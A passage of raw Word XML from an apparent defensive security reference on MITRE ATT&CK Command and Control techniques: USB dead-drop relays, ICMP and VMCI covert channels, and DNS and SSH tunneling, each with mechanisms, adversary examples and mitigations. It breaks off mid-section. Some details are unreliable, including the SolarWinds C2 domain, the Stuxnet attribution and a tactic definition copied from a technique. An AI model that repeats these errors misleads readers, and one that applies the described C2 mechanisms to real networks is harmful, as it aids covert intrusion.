      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mitigations &amp; Detection:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Desktop: Monitor for screencapture.exe or xwd executions in unusual contexts.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRDefault="005F3585" w:rsidP="00694159">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="48"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F3585">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Mobile: Restrict accessibility services via MDM policies (e.g., DevicePolicyManager.setPermittedAccessibilityServices).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005F3585" w:rsidRPr="005F3585" w:rsidRDefault="005F3585" w:rsidP="005F3585">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00F34F9E" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Command and Control</w:t>
      </w:r>
      <w:r w:rsidR="00984DC3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00984DC3" w:rsidRPr="00984DC3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Tactic (TA0011)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adversaries use removable media (e.g., USB drives) to transfer commands/data between compromised systems, especially in air-gapped networks where direct internet access is restricted. This technique bridges isolated systems and internet-connected nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>1) Technique: Communication Through Removable Media (T1092)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adversaries use removable media (e.g., USB drives) to transfer commands/data between compromised systems, especially in air-gapped networks where direct internet access is restricted. This technique bridges isolated system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>s and internet-connected nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Key Procedures</w:t>
      </w:r>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>"Dead Drop" Command Relay</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mechanism: Malware on an internet-connected system writes commands to a USB drive. When inserted into an air-gapped system, the malware reads and executes the commands, then writes results back to the drive. The drive is reinserted into the internet-connected system to relay results to the adversary.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversary Example: APT28 used USBStealer to exfiltrate data from air-gapped systems. Commands were hidden in USB files, and stolen data was relayed to internet-facing servers when the drive was reconnected.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Automated Payload Execution via Autorun</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mechanism: Malware exploits the Windows Autorun.inf feature (or social engineering) to auto-execute malicious scripts when removable media is inserted. Commands are embedded in files disguised as documents (e.g., report.lnk).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Adversary Example: Stuxnet spread via infected USBs in Iranian nuclear facilities. The malware used Autorun.inf to execute payloads that sabotaged centrifuges, evading network defenses.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Disable Autorun via Group Policy: Computer Configuration → Administrative Templates → Windows Components → AutoPlay Policies.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Restrict USB usage via EDR tools; encrypt removable media 13.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>2) Technique: Non-Application Layer Protocol (T1095)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adversaries leverage OSI layer 3–4 protocols (e.g., ICMP, UDP, raw sockets) for C2. These protocols (e.g., ICMP) are often less monitored than HTTP/DNS, allowing stealthy communication.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Key Procedures</w:t>
      </w:r>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>ICMP Covert Channels</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mechanism: Malware embeds commands in ICMP echo requests (ping packets) or uses custom payloads in ICMP headers. Replies carry exfiltrated data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversary Example: Anchor malware sent C2 commands via ICMP packets, masquerading as network diagnostics. Data was exfiltrated in ICMP reply payloads.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>VMCI Exploitation in ESXi Environments</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mechanism: Adversaries abuse VMware's Virtual Machine Communication Interface (VMCI) to communicate between guest VMs and the hypervisor. VMCI traffic bypasses traditional network monitoring (e.g., Wireshark) as it never leaves the host.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversary Example: Attackers deployed VMCI backdoors on ESXi hosts, enabling persistent C2 even if VMs were segmented or firewalled.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mitigations:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Block anomalous ICMP/UDP traffic with NIDS; monitor for oversized ping packets.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="41"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Disable VMCI in VMware settings unless required.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>3) Technique: Protocol Tunneling (T1572)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Definition:</w:t>
      </w:r>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Adversaries encapsulate C2 traffic within legitimate protocols (e.g., DNS, HTTPS, SSH) to bypass filtering. Tunneling disguises malicious data as benign traffic, often adding encryption.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Key Procedure</w:t>
      </w:r>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>DNS Tunneling for Data Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Mechanism: Commands are encoded in DNS queries (e.g., malware.example.com), and responses carry data in TXT records. Tools like DNSCat2 automate this process.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>Adversary Example: APT29 exfiltrated data via DNS tunneling during the SolarWinds breach. Queries to domains like api.solarwinds.com concealed C2 traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:ind w:left="757"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:t>SSH Port Forwarding for RDP Access</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984DC3" w:rsidRPr="00984DC3" w:rsidRDefault="00984DC3" w:rsidP="00984DC3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="42"/>
        </w:numPr>
        <w:ind w:left="1154"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984DC3">
        <w:rPr>
          <w:sz w:val="24"/>
